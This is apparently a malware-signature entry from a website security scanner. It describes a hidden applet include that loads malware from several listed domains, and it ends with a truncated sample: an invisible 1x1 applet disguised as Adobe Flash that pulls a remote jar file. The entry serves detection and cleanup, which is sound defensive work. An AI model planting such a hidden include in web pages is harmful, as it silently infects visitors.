SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwapplethd522

malware-entry-mwapplethd522

Description:

A hidden (and possibly malicious) applet remote include was identified. It is sometimes encoded with javascript to hide the fact that an applet call is present. Loads malware from multiple sources:

fenkaololo.com
discountsummer.ru
test-traffic.narod.ru
cvfplmpsap.co.tv
 (and many other domains).
 ```

This is used to load malware from external web sites while not being visible to the user.

**Affecting:**
Any web site

**Clean up:**
This malware is generally hidden on .js or .php files without heavy encoding. Sign up here to get it cleaned: [http://sucuri.net/signup](http://sucuri.net/signup)

**Malware dump (sample of malware):**

<applet name="adobe" code="adobeflash&#46class" archive="http://www.site.com/flash.jar" width="1" height="1";...